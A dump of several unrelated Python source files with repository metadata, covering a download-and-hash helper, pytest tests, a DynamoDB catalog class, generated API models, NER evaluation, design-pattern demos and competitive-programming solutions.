cache_file_dir = os.path.dirname(cache_file_path)
if not os.path.exists(cache_file_dir):
os.makedirs(cache_file_dir)
logger.info('Downloading remote file {} to {}'.format(url, cache_file_path))
download_url(url, cache_file_path)
assert_cache_file_is_ok(url, cache_file_path)
return cache_file_path
def assert_cache_file_is_ok(url, file_path):
"""Check that cache file has the correct hash."""
# File is already in the cache, verify that the md5sum matches and
# return local path
cache_file_md5sum = _get_file_md5sum(file_path)
ref_md5sum = _get_reference_md5sum(url)
assert cache_file_md5sum == ref_md5sum, \
('Target URL {} appears to be downloaded to the local cache file '
'{}, but the md5 hash of the local file does not match the '
'reference (actual: {} vs. expected: {}). You may wish to delete '
'the cached file and try again to trigger automatic '
'download.').format(url, file_path, cache_file_md5sum, ref_md5sum)
def _progress_bar(count, total):
"""Report download progress.
Credit:
https://stackoverflow.com/questions/3173320/text-progress-bar-in-the-console/27871113
"""
bar_len = 60
filled_len = int(round(bar_len * count / float(total)))
percents = round(100.0 * count / float(total), 1)
bar = '=' * filled_len + '-' * (bar_len - filled_len)
sys.stdout.write(
' [{}] {}% of {:.1f}MB file \r'.
format(bar, percents, total / 1024 / 1024)
)
sys.stdout.flush()
if count >= total:
sys.stdout.write('\n')
def download_url(
url, dst_file_path, chunk_size=8192, progress_hook=_progress_bar
):
"""Download url and write it to dst_file_path.
Credit:
https://stackoverflow.com/questions/2028517/python-urllib2-progress-hook
"""
response = urllib.request.urlopen(url)
total_size = response.info().getheader('Content-Length').strip()
total_size = int(total_size)
bytes_so_far = 0
with open(dst_file_path, 'wb') as f:
while 1:
chunk = response.read(chunk_size)
bytes_so_far += len(chunk)
if not chunk:
break
if progress_hook:
progress_hook(bytes_so_far, total_size)
f.write(chunk)
return bytes_so_far
def _get_file_md5sum(file_name):
"""Compute the md5 hash of a file."""
hash_obj = hashlib.md5()
with open(file_name, 'r') as f:
hash_obj.update(f.read())
return hash_obj.hexdigest()
def _get_reference_md5sum(url):
"""By convention the md5 hash for url is stored in url + '.md5sum'."""
url_md5sum = url + '.md5sum'
md5sum = urllib.request.urlopen(url_md5sum).read().strip()
return md5sum
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
65e9bfc51a6d4ab7499c2b0d6f71f5725e351419 | 8fe440deb4eb66d2fcb222a7c43680dc516394c1 | /src/api/bkuser_core/tests/categories/plugins/custom/test_client.py | 4c5bf6bce48cd7f37c39efcb6734fed68794bd8c | [
"MIT"
] | permissive | robert871126/bk-user | 780e163db76a8a997ed94a1a83389fa4f81ad6a4 | 8c633e0a3821beb839ed120c4514c5733e675862 | refs/heads/master | 2023-08-20T11:05:46.317044 | 2021-10-22T08:44:06 | 2021-10-22T08:44:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,217 | py | # -*- coding: utf-8 -*-
"""
TencentBlueKing is pleased to support the open source community by making 蓝鲸智云-用户管理(Bk-User) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import json
from unittest.mock import patch
import pytest
from bkuser_core.categories.plugins.custom.client import CustomDataClient
from bkuser_core.categories.plugins.custom.exceptions import CustomAPIRequestFailed
from bkuser_core.categories.plugins.custom.models import CustomTypeList
from requests import Request, Response
pytestmark = pytest.mark.django_db
class TestClient:
@staticmethod
def make_resp(content: list, status_code: int = 200) -> Response:
response = Response()
response._content = str.encode(json.dumps({"count": len(content), "results": content})) # type: ignore
response.status_code = status_code
fake_req = Request(method="GET", json={}, url="")
fake_req.body = None # type: ignore
response.request = fake_req # type: ignore
return response
@pytest.fixture
def client(self, test_custom_category):
c = CustomDataClient(
api_host="test.com",
category_id=test_custom_category.id,
paths={"profile": "some-path", "department": "some-path"},
)
return c
@pytest.mark.parametrize(
"fake_profiles,expected",
[
(
[
{
"username": "fake-user",
"email": "fake@test.com",
"code": "code-1",
"display_name": "fakeman",
"telephone": "13111123445",
"leaders": [],
"departments": [],
"extras": {"aaa": "xxxx", "bbb": "qqqq", "uniquetest": "vvvv"},
"position": 0,
},
{
"username": "fake-user-2",
"email": "fake2@test.com",
"code": "code-2",
"display_name": "fakeman2",
"telephone": "13111123445",
"leaders": ["code-1"],
"departments": [],
"extras": {"aaa": "xxxx", "bbb": "qqqq", "uniquetest": "vvvv"},
"position": 0,
},
],
{"code-1", "code-2"},
),
],
)
def test_fetch_profiles(self, client, fake_profiles, expected):
with patch("requests.get") as mocked_get:
mocked_get.return_value = self.make_resp(fake_profiles)
r = client.fetch_profiles()
assert isinstance(r, CustomTypeList)
assert len(r.values) == len(fake_profiles)
assert set(r.items_map.keys()) == expected
@pytest.mark.parametrize(
"fake_profiles,expected",
[
(
[
{
"username": "fake-user",
"email": "fake@test.com",
"code": "code-1",
"extras": {"aaa": "xxxx", "bbb": "qqqq", "uniquetest": "vvvv"},
"position": 0,
}
],
TypeError,
),
],
)
def test_fetch_wrong_profiles(self, client, fake_profiles, expected):
with patch("requests.get") as mocked_get:
mocked_get.return_value = self.make_resp(fake_profiles)
with pytest.raises(expected):
client.fetch_profiles()
@pytest.mark.parametrize(
"fake_departments,expected",
[
(
[
{"name": "测试部门", "code": "dep1", "parent": None},
{"name": "测试部门2", "code": "dep2", "parent": "dep1"},
],
{"dep1", "dep2"},
),
],
)
def test_fetch_departments(self, client, fake_departments, expected):
with patch("requests.get") as mocked_get:
mocked_get.return_value = self.make_resp(fake_departments)
r = client.fetch_departments()
assert isinstance(r, CustomTypeList)
assert len(r.values) == len(fake_departments)
assert set(r.items_map.keys()) == expected
def test_fetch_exception(self, client):
with patch("requests.get") as mocked_get:
mocked_get.return_value = self.make_resp([], 400)
with pytest.raises(CustomAPIRequestFailed):
client.fetch_departments()
| [
"bluesedenyu@gmail.com"
] | bluesedenyu@gmail.com |
50a1c197aa182e2136aec1c04b8b9ee483b8ca09 | f9a8ee37334771f37edda863db08a7dcccc9522f | /AtCoder/Practice/茶緑埋め/ARC016B.py | 751d89f85482bc23091e3ca78e6dbd24952fce1a | [] | no_license | shimmee/competitive-programming | 25b008ee225858b7b208c3f3ca7681e33f6c0190 | 894f0b7d557d6997789af3fcf91fe65a33619080 | refs/heads/master | 2023-06-07T13:07:17.850769 | 2021-07-05T17:20:47 | 2021-07-05T17:20:47 | 331,076,780 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,205 | py | # ARC016B - 音楽ゲーム
# URL: https://atcoder.jp/contests/arc016/tasks/arc016_2
# Date: 2021/02/18
# ---------- Ideas ----------
# 90度回転させてgroupbyする
# key=='x'であれば連続する長さをインクリメント
# key == 'o'であれば+1インクリメント
# ------------------- Answer --------------------
#code:python
from itertools import groupby
def rotated(array_2d):
list_of_tuples = zip(*array_2d[::-1])
return [list(elem) for elem in list_of_tuples]
n = int(input())
a = [input() for _ in range(n)]
a = rotated(a)
ans = 0
for l in a:
gr = groupby(l)
for key, group in gr:
if key == 'x':
ans += len(list(group))
elif key == 'o':
ans += 1
print(ans)
# ACしたけど解説が違う解き方してた!
# 列数と同じ長さの配列を用意して,直前(上)がoだったらTrueにして,カウントしない
n = int(input())
X = [input() for _ in range(n)]
flag = [False]*9
ans = 0
for i in range(n):
for j in range(9):
s = X[i][j]
if s == 'o':
if not flag[j]:
ans += 1
flag[j] = True
else:
flag[j] = False
if s == 'x': ans += 1
print(ans)
# もっと簡単にかける。直前(上)がoかどうかを毎回調べればいい
n = int(input())
S = ['.'*9] + [input() for _ in range(n)]
ans = 0
for y in range(1, n+1):
for x in range(9):
if S[y][x] == 'x':
ans += 1
elif S[y][x] == 'o' and S[y-1][x] != 'o':
ans += 1
print(ans)
# ------------------ Sample Input -------------------
6
..o..x.o.
..o..x.o.
..x..o.o.
..o..o.o.
..o..x.o.
..o..x.o.
15
.........
.x.......
.........
...x.....
.........
.......o.
.......o.
.......o.
.........
..x.....o
........o
........o
....x...o
.x......o
........o
# ----------------- Length of time ------------------
# 7分
# -------------- Editorial / my impression -------------
# https://www.slideshare.net/chokudai/atcoder-regular-contest-016
# 解説にある方法2つとも試してみた。
# 結局普通に全探索するのが一番早い
# ----------------- Category ------------------
#AtCoder
#全探索
#ARC-B | [
"shinmeikeita@gmail.com"
] | shinmeikeita@gmail.com |
87cbbb361b99a7e07ef4e3ae17d6ca347ce8425f | 5e277a32c166ae45bea28310074dc459a0d99cf6 | /.metadata/.plugins/org.eclipse.core.resources/.history/ba/50143292859b00161299af2c090fd9cc | 9158d155646d3e761ac70b1bf19b0f6db5aa03ea | [] | no_license | vgvcode/pos | 4d7172d7905f60157fcae445c650475d17a9a390 | a9dba2c5c3fc8c4529c6619a3dc92c9608a4c70d | refs/heads/master | 2021-01-13T13:12:37.833510 | 2016-11-02T22:28:42 | 2016-11-02T22:28:42 | 72,686,364 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,974 | #!/usr/bin/python
from __future__ import print_function # Python 2/3 compatibility
import json
from decimal import *
import time
import uuid
import boto3
from copy import deepcopy
from boto3.dynamodb.conditions import Key
import commonmodule
# Helper class to convert a DynamoDB item to JSON.
class DecimalEncoder(json.JSONEncoder):
def default(self, o):
if isinstance(o, Decimal):
if o % 1 > 0:
return float(o)
else:
return int(o)
return super(DecimalEncoder, self).default(o)
class CatalogSchema:
'base class for DDL operations on catalog'
tableName = 'catalog'
def __init(self, endpoint = "http://localhost:8000"):
self.__endpoint = endpoint
self.__dynamodb = boto3.resource('dynamodb', endpoint_url=endpoint)
def createTable(self):
'create a new catalog'
result = True
try:
self.__table = self.__dynamodb.create_table(
TableName=CatalogSchema.tableName,
KeySchema=[
{
'AttributeName': 'CatalogID',
'KeyType': 'HASH' #Partition key
},
{
'AttributeName': 'ItemID',
'KeyType': 'RANGE' #Sort key
}
],
AttributeDefinitions=[
{
'AttributeName': 'CatalogID',
'AttributeType': 'S'
},
{
'AttributeName': 'ItemID',
'AttributeType': 'S'
},
],
ProvisionedThroughput={
'ReadCapacityUnits': 10,
'WriteCapacityUnits': 10
}
)
except Exception as e:
print(e.response['Error']['Message'])
result = False
finally:
return result
def deleteTable(self):
result = True
try:
self.__table.delete()
except Exception as e:
print(e.response['Error']['Message'])
result = False
finally:
return result
class Catalog:
'common base class for catalog'
tableName = 'catalog'
def __init__(self, catalogId, endpoint = "http://localhost:8000"):
self.__endpoint = endpoint
self.__dynamodb = boto3.resource('dynamodb', endpoint_url=endpoint)
self.__table = self.__dynamodb.Table(Catalog.tableName)
self.__catalogId = catalogId
self.__items = {}
self.fetchFromDB()
def get(self):
return {
"catalogId" : self.__catalogId,
"endpoint" : self.__endpoint,
"tableName" : Catalog.tableName,
"items" : self.__items
}
def load(self, fileName):
result = True
try:
'load the catalog from a json file'
with open(fileName) as json_file:
catalog = json.load(json_file, parse_float = Decimal)
for catItem in catalog:
CatalogID = catItem['CatalogID']
ItemID = catItem['ItemID']
Info = catItem['Info']
print("Adding item:", CatalogID, ItemID, Info)
self.__table.put_item(
Item={
'CatalogID': CatalogID,
'ItemID': ItemID,
'Info': Info
}
)
except Exception as e:
print(e.response['Error']['Message'])
result = False
finally:
return result
def fetchFromDB(self):
'fetch the catalog'
'first clear the existing catalog'
result = True
self.__items = {}
try:
response = self.__table.query(KeyConditionExpression=Key('CatalogID').eq(self.__catalogId))
for r in response['Items']:
self.__items[r['ItemID']] = r['Info']
except Exception as e:
print(e.response['Error']['Message'])
result = False
finally:
return result
def addItem(self, idy, name, price):
'add item to the catalog'
result = True
print('Adding to DB: {}, {}, {}'.format(idy, name, price))
createdTicks = time.time()
createdTime = time.asctime(time.localtime(createdTicks))
info = {
'ItemId': idy,
'CreatedTime': createdTime,
'CreatedTicks': Decimal(createdTicks),
'UpdatedTime': "0",
'UpdatedTicks': Decimal(0),
'Name': name,
'Price': commonmodule.money(price)
}
try:
response = self.__table.put_item(
Item={
'CatalogID': self.__catalogId,
'ItemID': idy,
'Info': info
}
)
'add the item to the catalog in memory'
self.__items[idy] = info
#print("PutItem succeeded:")
#print(json.dumps(response, indent=4, cls=DecimalEncoder))
except Exception as e:
print(e.response['Error']['Message'])
result = False
finally:
return result
def getItems(self):
return self.__items
def updatePrice(self, itemId, price):
'update item price'
result = True
updatedTicks = time.time()
updatedTime = time.asctime(time.localtime(updatedTicks))
try:
response = self.__table.update_item(
Key={
'CatalogID': self.__catalogId,
'ItemID': itemId,
},
UpdateExpression="set Info.Price = :p, Info.UpdatedTime = :u, Info.UpdatedTicks = :t",
ExpressionAttributeValues={
':p': commonmodule.money(price),
':u': updatedTime,
':t': Decimal(updatedTicks),
},
ReturnValues="UPDATED_NEW"
)
print("Item updated")
result = True
#print("UpdateItem succeeded:")
#print(json.dumps(response, indent=4, cls=DecimalEncoder))
'update the item in the catalog in memory'
self.__items[itemId]['Price'] = commonmodule.money(price)
self.__items[itemId]['UpdatedTime'] = updatedTime
self.__items[itemId]['UpdatedTicks'] = updatedTicks
except Exception as e:
print(e.response['Error']['Message'])
result = False
finally:
return result
def removeItem(self, itemId):
'remove item from catalog'
result = False
try:
response = self.__table.delete_item(
Key={
'CatalogID': self.__catalogId,
'ItemID': itemId,
},
)
'remove the item from the catalog in memory'
del self.__items[itemId]
#print("DeleteItem succeeded:")
#print(json.dumps(response, indent=4, cls=DecimalEncoder))
except Exception as e:
print(e.response['Error']['Message'])
finally:
return result
def print(self):
for itm in self.__items:
print('{}: {}'.format(itm, self.__items[itm]))
print('There are {} items in the catalog'.format(len(self.__items)))
| [
"vgvcode@gmail.com"
] | vgvcode@gmail.com | |
7481ab62600b37b564fb2f0ca4915e76760a84d7 | 4234dc363d0599e93abc1d9a401540ad67702b3b | /clients/kratos/python/ory_kratos_client/model/ui_node_text_attributes.py | 5f6f84ba22c9664700ca785fb6b7853756a8cdfd | [
"Apache-2.0"
] | permissive | ninjayoto/sdk | 8065d3f9e68d287fc57cc2ae6571434eaf013157 | 73823009a416905a4ca1f9543f1a94dd21e4e8da | refs/heads/master | 2023-08-28T03:58:26.962617 | 2021-11-01T17:57:24 | 2021-11-01T17:57:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,102 | py | """
Ory Kratos API
Documentation for all public and administrative Ory Kratos APIs. Public and administrative APIs are exposed on different ports. Public APIs can face the public internet without any protection while administrative APIs should never be exposed without prior authorization. To protect the administative API port you should use something like Nginx, Ory Oathkeeper, or any other technology capable of authorizing incoming requests. # noqa: E501
The version of the OpenAPI document: v0.8.0-alpha.2
Contact: hi@ory.sh
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from ory_kratos_client.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
from ..model_utils import OpenApiModel
from ory_kratos_client.exceptions import ApiAttributeError
def lazy_import():
from ory_kratos_client.model.ui_text import UiText
globals()['UiText'] = UiText
class UiNodeTextAttributes(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'id': (str,), # noqa: E501
'node_type': (str,), # noqa: E501
'text': (UiText,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'id': 'id', # noqa: E501
'node_type': 'node_type', # noqa: E501
'text': 'text', # noqa: E501
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, id, node_type, text, *args, **kwargs): # noqa: E501
"""UiNodeTextAttributes - a model defined in OpenAPI
Args:
id (str): A unique identifier
node_type (str):
text (UiText):
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.id = id
self.node_type = node_type
self.text = text
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, id, node_type, text, *args, **kwargs): # noqa: E501
"""UiNodeTextAttributes - a model defined in OpenAPI
Args:
id (str): A unique identifier
node_type (str):
text (UiText):
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.id = id
self.node_type = node_type
self.text = text
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.")
| [
"3372410+aeneasr@users.noreply.github.com"
] | 3372410+aeneasr@users.noreply.github.com |
ead246f8b3bc4b82a6e3c6fcbc15adda7e8c9394 | 2148b047f6b0e8c3182aae438d745cf35234220c | /config/eval.py | 6b77931a633704949ff5f9f810166b62f52199b4 | [] | no_license | xzk-seu/xzk_thesis_code | d12845fdbed38893ac66aec876ed8933c5a7a2a1 | abfebca5315725d28346ddc362abe1fef73097b9 | refs/heads/master | 2023-04-11T19:36:16.556585 | 2021-05-07T12:18:18 | 2021-05-07T12:18:18 | 363,370,982 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,078 | py | from typing import List
from common import Instance
import torch
import numpy as np
class Span:
"""
A class of `Span` where we use it during evaluation.
We construct spans for the convenience of evaluation.
"""
def __init__(self, left: int, right: int, type: str):
"""
A span compose of left, right (inclusive) and its entity label.
:param left:
:param right: inclusive.
:param type:
"""
self.left = left
self.right = right
self.type = type
def __eq__(self, other):
return self.left == other.left and self.right == other.right and self.type == other.type
def __hash__(self):
return hash((self.left, self.right, self.type))
def evaluate_batch_insts(batch_insts: List[Instance],
batch_pred_ids: torch.LongTensor,
batch_gold_ids: torch.LongTensor,
word_seq_lens: torch.LongTensor,
idx2label: List[str],
use_crf_layer: bool = True) -> np.ndarray:
"""
:return: numpy array containing (number of true positive, number of all positive, number of true positive + number of false negative)
You can also refer as (number of correctly predicted entities, number of entities predicted, number of entities in the dataset)
"""
p = 0
total_entity = 0
total_predict = 0
word_seq_lens = word_seq_lens.tolist()
for idx in range(len(batch_pred_ids)):
length = word_seq_lens[idx]
output = batch_gold_ids[idx][:length].tolist()
prediction = batch_pred_ids[idx][:length].tolist()
prediction = prediction[::-1] if use_crf_layer else prediction
output = [idx2label[l] for l in output]
prediction =[idx2label[l] for l in prediction]
batch_insts[idx].prediction = prediction
#convert to span
output_spans = set()
start = -1
# for i in range(len(output)):
# if output[i].startswith("B-"):
# start = i
# if output[i].startswith("E-"):
# end = i
# output_spans.add(Span(start, end, output[i][2:]))
# if output[i].startswith("S-"):
# output_spans.add(Span(i, i, output[i][2:]))
# predict_spans = set()
# for i in range(len(prediction)):
# if prediction[i].startswith("B-"):
# start = i
# if prediction[i].startswith("E-"):
# end = i
# predict_spans.add(Span(start, end, prediction[i][2:]))
# if prediction[i].startswith("S-"):
# predict_spans.add(Span(i, i, prediction[i][2:]))
for i in range(len(output)):
if output[i].startswith("B-"):
start = i
if output[i].startswith("E-"):
end = i
output_spans.add(Span(start, end, output[i][2:]))
if output[i].startswith("S-"):
output_spans.add(Span(i, i, output[i][2:]))
predict_spans = set()
for i in range(len(prediction)):
if prediction[i].startswith("B-"):
start = i
if prediction[i].startswith("E-"):
end = i
predict_spans.add(Span(start, end, prediction[i][2:]))
if prediction[i].startswith("S-"):
predict_spans.add(Span(i, i, prediction[i][2:]))
total_entity += len(output_spans)
total_predict += len(predict_spans)
p += len(predict_spans.intersection(output_spans))
# In case you need the following code for calculating the p/r/f in a batch.
# (When your batch is the complete dataset)
# precision = p * 1.0 / total_predict * 100 if total_predict != 0 else 0
# recall = p * 1.0 / total_entity * 100 if total_entity != 0 else 0
# fscore = 2.0 * precision * recall / (precision + recall) if precision != 0 or recall != 0 else 0
return np.asarray([p, total_predict, total_entity], dtype=int)
| [
"1399350807@qq.com"
] | 1399350807@qq.com |
02d5599e8cefba6aba67e00d744ef474a2d137de | b15a9d9c7374c4a1fa5ec3ef63603a8c57e8681f | /Design-Patterns-Python/facade/game_api.py | c049520bdfdac8376257014495a620024530efab | [] | no_license | gohils/zemr_notebook | 3f7490ef7a2559655746c3e2e0dbfb835a83891e | 00d53cea9970df44160c51e6ad2bdeadfae2c91f | refs/heads/master | 2023-08-04T14:32:35.428016 | 2023-07-20T11:51:08 | 2023-07-20T11:51:08 | 222,027,451 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,207 | py | "The Game API facade"
from decimal import Decimal
from users import Users
from wallets import Wallets
from game_engine import GameEngine
from reports import Reports
class GameAPI():
"The Game API facade"
@staticmethod
def get_balance(user_id: str) -> Decimal:
"Get a players balance"
return Wallets.get_balance(user_id)
@staticmethod
def game_state() -> dict:
"Get the current game state"
return GameEngine().get_game_state()
@staticmethod
def get_history() -> dict:
"get the game history"
return Reports.get_history()
@staticmethod
def change_pwd(user_id: str, password: str) -> bool:
"change users password"
return Users.change_pwd(user_id, password)
@staticmethod
def submit_entry(user_id: str, entry: Decimal) -> bool:
"submit a bet"
return GameEngine().submit_entry(user_id, entry)
@staticmethod
def register_user(value: dict[str, str]) -> str: # Python 3.9
# def register_user(value) -> str: # Python 3.8 and earlier
"register a new user and returns the new id"
return Users.register_user(value)
| [
"noreply@github.com"
] | gohils.noreply@github.com |
996b44812bd5d0977998f519cc46389a487cbfff | f54fdbb8301f54dda8551bb811e864d3a81da6de | /Python/심화_클래스활용_실습코드/Advanced_OOP_6.py | 92141b2e98259d343ecd114a4d1b92c725d51320 | [] | no_license | Jerrykim91/Daily | 0533afe1956ca5cc88f7d69f7810b489240e70e6 | 30f738fc9728b7501bf5601e17189f47c13aaec9 | refs/heads/master | 2021-07-24T23:18:09.686269 | 2020-10-17T12:07:57 | 2020-10-17T12:07:57 | 226,638,343 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,781 | py |
# 출처 : README.md 참조
"""
클래스 메소드의 사용법 +
# 리턴하는 기능을 가진 스태틱 메소드
"""
class Person(object):
# my_class_var = 'sanghee'
def __init__(self, year, month, day, sex):
self.year = year
self.month = month
self.day = day
self.sex = sex
def __str__(self):
return '{}년 {}월 {}일생 {}'.format(self.year, self.month, self.day, self.sex)
@classmethod
def ssnConstructor(cls, ssn):
front, back = ssn.split('-')
sex = back[0]
if sex == '1' or sex == '2':
year = '19' + front[:2]
else :
year = '20' + front[:2]
if (int(sex)%2) == 0 :
sex = '여성'
else :
sex = '남성'
month = front[2:4]
day = front[4:6]
return cls(year, month, day, sex)
@staticmethod
def isWorkDay(day):
"""
근무 여부를 리턴하는 기능을 가진 스태틱 메소드
월: 0, 화: 1, 수: 2, 목: 3, 금: 4, 토: 5, 일: 6
"""
if day.weekday() == 5 or day.weekday() == 6 :
return False
return True
ssn_1 = '900829-1000006'
ssn_2 = '951224-2000069'
ssn_3 = '201214-4000069'
Jun = Person.ssnConstructor(ssn_1)
Jain = Person.ssnConstructor(ssn_2)
Rose = Person.ssnConstructor(ssn_3)
print(Jun)
print(Jain)
print(Rose)
import datetime
myDate = datetime.date(2020, 6, 21)
yourDate = datetime.date(2020, 6, 22)
print(Person.isWorkDay(myDate)) # 클래스를 통하여 스태틱 메소드 호출
print(Rose.isWorkDay(myDate)) # 인스턴스를 통하여 스태틱 메소드 호출
print('='*25)
print(Person.isWorkDay(yourDate))
print(Rose.isWorkDay(yourDate)) | [
"sun4131@gmail.com"
] | sun4131@gmail.com |
ddc15468630f01ae1dab3138722888d249e76ae0 | 7548c8efccb43b1d8daec719bd7d8ad4a4d03630 | /Wildcard Matching/Leetcode_44.py | 7999629e5a083344bd36c21f952567b1a3033e3d | [] | no_license | arw2019/AlgorithmsDataStructures | fdb2d462ded327857d72245721d3c9677ba1617b | 9164c21ab011c90944f844e3c359093ce6180223 | refs/heads/master | 2023-02-17T11:50:07.418705 | 2021-01-19T19:37:17 | 2021-01-19T19:37:17 | 204,222,584 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,764 | py | # dynamic program
# O(m*n) runtime, O(n) space
class Solution:
def isMatch(self, s: str, p: str) -> bool:
m, n = len(s), len(p)
cur = [True] + [False]*(m)
print(cur)
for j in range(1, n+1):
pre = cur[0]
cur[0] = cur[0] and (p[j-1] == '*')
for i in range(1, m+1):
if p[j-1] != '*':
pre, cur[i] = cur[i], pre and (s[i-1]==p[j-1] or p[j-1]=='?')
else:
pre, cur[i] = cur[i], cur[i-1] or cur[i]
return cur[m]
# dynamic program
# o(m*n) runtime, o(m*n) space
class Solution:
def isMatch(self, s: str, p: str) -> bool:
m, n = len(s), len(p)
dp = [[False]*(n+1) for _ in range(m+1)]
dp[0][0] = True
for j in range(1, n+1):
dp[0][j] = p[j-1] == '*' and dp[0][j-1]
for j in range(1, n+1):
for i in range(1, m+1):
if p[j-1] != '*':
if p[j-1] in ('?', s[i-1]):
dp[i][j] = dp[i-1][j-1]
else:
dp[i][j] = dp[i][j-1] or dp[i-1][j]
return dp[-1][-1]
# finite-state machine solution
class Solution:
def isMatch(self, s: str, p: str) -> bool:
transfer = {}
state = 0
for char in p:
if char == '*':
transfer[state, char] = state
else:
transfer[state, char] = state + 1
state += 1
print(transfer)
accept = state
state = {0}
for char in s:
state = {transfer.get((at, token)) for at in state for token in (char, '*', '?')}
return accept in state
| [
"noreply@github.com"
] | arw2019.noreply@github.com |
